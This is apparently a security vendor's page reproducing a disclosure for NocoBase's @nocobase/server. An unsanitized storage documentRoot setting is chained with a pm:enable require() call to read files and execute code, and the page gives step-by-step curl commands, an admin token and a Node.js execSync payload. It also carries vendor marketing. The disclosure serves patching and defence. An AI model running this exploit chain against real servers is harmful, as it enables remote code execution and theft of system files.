GHSA-ghvf-qf6h-g8x5
Fix: nocobase/nocobase#9628GHSA-ghvf-qf6h-g8x5 is a remote code execution vulnerability in @nocobase/server. O3 Security confirms whether GHSA-ghvf-qf6h-g8x5 is actually reachable in your code before you act, and blocks exploitation at runtime until you patch.
NocoBase: Arbitrary File Write chained with Local file Inclusion leads to Remote code execution
Real-World Exposure
How broadly this vulnerability is actually deployed: weekly install volume shows current usage, and reverse-dependency count shows how many other packages break if it stays unpatched.
@nocobase/servernpmDescription
Executive Summary
Two vulnerabilities were identified and chained to achieve authenticated remote code execution
The first vulnerability allows any authenticated admin to redirect the file upload storage root to an arbitrary path on disk including the application directory itself by supplying an unsanitized documentRoot value to the storages:update API. The second vulnerability allows the same admin to trigger Node.js require() on any absolute filesystem path via the pm:enable plugin manager endpoint, which accepts user-supplied paths with no validation (Local File Inclusion).
Chained together, these two flaws allow an attacker with admin credentials to write a malicious file and have it trigger on the system achieving remote code execution.
A working proof-of-concept exploit chain was developed and verified, requiring only a valid admin session token.
VULN 1: Arbitrary File Write via storages:update documentRoot Manipulation
Summary
The file-manager plugin's storage update endpoint accepts an arbitrary documentRoot value without validation. An authenticated admin can overwrite a storage record's documentRoot to any absolute path on the filesystem, then upload files that land anywhere the Node.js process (root in default Docker deployments) can write including the web root, the application source directory, or system paths.
Vulnerable Components
packages/plugins/@nocobase/plugin-file-manager/src/server/storages/local.ts | getDocumentRoot() L24–27 |
packages/plugins/@nocobase/plugin-file-manager/src/server/actions/attachments.ts | createMiddleware()
Server route: POST /api/storages:update
Server route: POST /api/attachments:upload
Root Cause
getDocumentRoot() resolves the documentRoot field from the storage record:
// packages/plugins/@nocobase/plugin-file-manager/src/server/storages/local.ts
const { documentRoot = process.env.LOCAL_STORAGE_DEST || path.join(process.cwd(), 'storage', 'uploads') } =
this.storage.options || {};
return path.resolve(path.isAbsolute(documentRoot) ? documentRoot : path.join(process.cwd(), documentRoot));
resolveSafePath() is called during file upload to prevent filename traversal, but it uses the already-resolved (attacker-controlled) documentRoot as its safe root. There is no validation on the documentRoot value itself at creation or update time. An admin can set documentRoot to any path (/, /etc, /var/www/html, the app root) and the upload will write there.
The creation endpoint (storages:create) also accepts arbitrary documentRoot, but the update endpoint is worse: it silently replaces the root on an existing (potentially already-default) storage, bypassing any frontend guards.
Steps to Reproduce
Prerequisites: Admin session token.
Step 1 Get the local storage ID:
curl -s "http://192.168.228.130:13000/api/storages" \
-H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInRlbXAiOnRydWUsImlhdCI6MTc3OTgzMTc1NCwic2lnbkluVGltZSI6MTc3OTgzMTc1NDE3MSwiZXhwIjoxNzc5OTE4MTU0LCJqdGkiOiJlZTJhMTU5Zi04MmE1LTQxZDctOTgyMC02ODlmOTM1Yjk2NWQifQ.Q_4m87ZDKI4bDW6QejoHYveGPNCaxzDJN-N_0B_pAfI"
Storage ID on this target: 366584416632832
Step 2 Create the RCE payload:
cat > /tmp/rce_proof.js << 'EOF'
const { execSync } = require('child_process');
const fs = require('fs');
const out = execSync('id; whoami; hostname').toString();
fs.writeFileSync('/home/spooky/nocobase/storage/uploads/out.txt', out);
module.exports = {};
EOF
Step 3 Redirect storage documentRoot to app CWD:
curl -s -X POST "http://192.168.228.130:13000/api/storages:update?filterByTk=366584416632832" \
-H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInRlbXAiOnRydWUsImlhdCI6MTc3OTgzMTc1NCwic2lnbkluVGltZSI6MTc3OTgzMTc1NDE3MSwiZXhwIjoxNzc5OTE4MTU0LCJqdGkiOiJlZTJhMTU5Zi04MmE1LTQxZDctOTgyMC02ODlmOTM1Yjk2NWQifQ.Q_4m87ZDKI4bDW6QejoHYveGPNCaxzDJN-N_0B_pAfI" \
-H "Content-Type: application/json" \
-d '{"options":{"documentRoot":"."},"default":true}'
<img width="826" height="304" alt="image" src="https://github.com/user-attachments/assets/808bf5cf-f6cc-4df6-9d94-b84cff1dcd66" />
Step 4 upload the RCE payload:
The payload writes output to the NocoBase uploads directory, which is served statically on port 13000
curl -s -X POST "http://192.168.228.130:13000/api/attachments:upload" \
-H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInRlbXAiOnRydWUsImlhdCI6MTc3OTgzMTc1NCwic2lnbkluVGltZSI6MTc3OTgzMTc1NDE3MSwiZXhwIjoxNzc5OTE4MTU0LCJqdGkiOiJlZTJhMTU5Zi04MmE1LTQxZDctOTgyMC02ODlmOTM1Yjk2NWQifQ.Q_4m87ZDKI4bDW6QejoHYveGPNCaxzDJN-N_0B_pAfI" \
-F "file=@/tmp/rce_proof.js;filename=rce_proof.js;type=application/javascript"
<img width="826" height="322" alt="image" src="https://github.com/user-attachments/assets/146492ff-7eeb-4742-a13d-6bb3f9e0cd72" />
Now that the file is uploaded successfully we can trigger the RCE with the LFI shown below
VULN 2: Error-Based Local File Inclusion via pm:enable Unsanitized requireModule() Call
Overview
pm:enable passes filterByTk directly to require() with no path validation. This is a standalone LFI primitive with two modes:
- Non-JS files (e.g.
/etc/passwd): Node.js parses them as JavaScript, fails with aSyntaxErrorthat embeds the file content in the error message. That error is written tosystem_error_YYYY-MM-DD.logand is downloadable vialogger:downloadgiving an attacker blind/error-based file read. - JS files (e.g. an attacker-uploaded payload): the file executes as Node.js code in the server process RCE. This is the second stage of the chain with VULN-01.
Root Cause
The enable action takes filterByTk from query params and passes it directly to the CLI runner with zero validation:
// packages/core/server/src/plugin-manager/options/resource.ts L141-151
async enable(ctx, next) {
const { filterByTk } = ctx.action.params; // ← raw user input
if (!filterByTk) {
ctx.throw(400, 'plugin name invalid');
}
const keys = Array.isArray(filterByTk) ? filterByTk : [filterByTk];
app.runAsCLI(['pm', 'enable', ...keys], { from: 'user' }); // ← no sanitization
ctx.body = filterByTk;
await next();
},
The CLI handler calls requireModule(key):
// packages/core/utils/src/requireModule.ts
export function requireModule(m: any) {
if (typeof m === 'string') {
m = require(m); // ← arbitrary file executed as Node.js module
}
if (typeof m !== 'object') { return m; }
return m.__esModule ? m.default : m;
}
assertSafePluginPackageName() exists in the codebase (validates against absolute paths and ..) but is never invoked in the HTTP action path — only in storage directory helpers. The HTTP handler goes straight from user input → require().
Steps to Reproduce Error-Based File Read (Standalone)
Step 1 Trigger require() on any file:
curl -s "http://TARGET:13000/api/pm:enable?filterByTk=/etc/passwd" \
-H "Authorization: Bearer TOKEN"
# Response: {"data":"/etc/passwd"} — 200 OK
Node.js attempts to parse /etc/passwd as a JavaScript module. It fails at the first : character with:
and we see the error message after sending the request:
<img width="1036" height="380" alt="image" src="https://github.com/user-attachments/assets/b8ddbf38-7de0-47ba-aa56-39ac4f2de400" />Step 2 navigate to the logger and download the system error log
<img width="1142" height="720" alt="image" src="https://github.com/user-attachments/assets/84103a14-99a6-4db0-bf86-35d5d09f730d" />now when we extract the .tar file we can see proof of local file inclusion (partial in this response):
<img width="1264" height="268" alt="image" src="https://github.com/user-attachments/assets/8f90ee8b-16d2-4bbf-8308-29ed80330ec8" />Remote code execution
With our node js payload sitting at the web root all we must do now is use the local file inclusion in pm:enable to trigger it
curl -s "http://192.168.228.130:13000/api/pm:enable?filterByTk=/home/spooky/nocobase/rce_proof.js" \
-H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInRlbXAiOnRydWUsImlhdCI6MTc3OTgzMTc1NCwic2lnbkluVGltZSI6MTc3OTgzMTc1NDE3MSwiZXhwIjoxNzc5OTE4MTU0LCJqdGkiOiJlZTJhMTU5Zi04MmE1LTQxZDctOTgyMC02ODlmOTM1Yjk2NWQifQ.Q_4m87ZDKI4bDW6QejoHYveGPNCaxzDJN-N_0B_pAfI"
Retrieve output via NocoBase static file serving
<img width="832" height="214" alt="image" src="https://github.com/user-attachments/assets/1ed60982-fc93-48f0-8b34-4bae0412ced2" /> <img width="810" height="96" alt="image" src="https://github.com/user-attachments/assets/15241236-2701-4488-a9a9-a504c9505562" />Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | @nocobase/server | all versions | 2.1.5 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @nocobase/server. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update @nocobase/server to 2.1.5 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-ghvf-qf6h-g8x5 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-ghvf-qf6h-g8x5 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-ghvf-qf6h-g8x5. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-ghvf-qf6h-g8x5 in your dependencies?
O3 detects GHSA-ghvf-qf6h-g8x5 across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.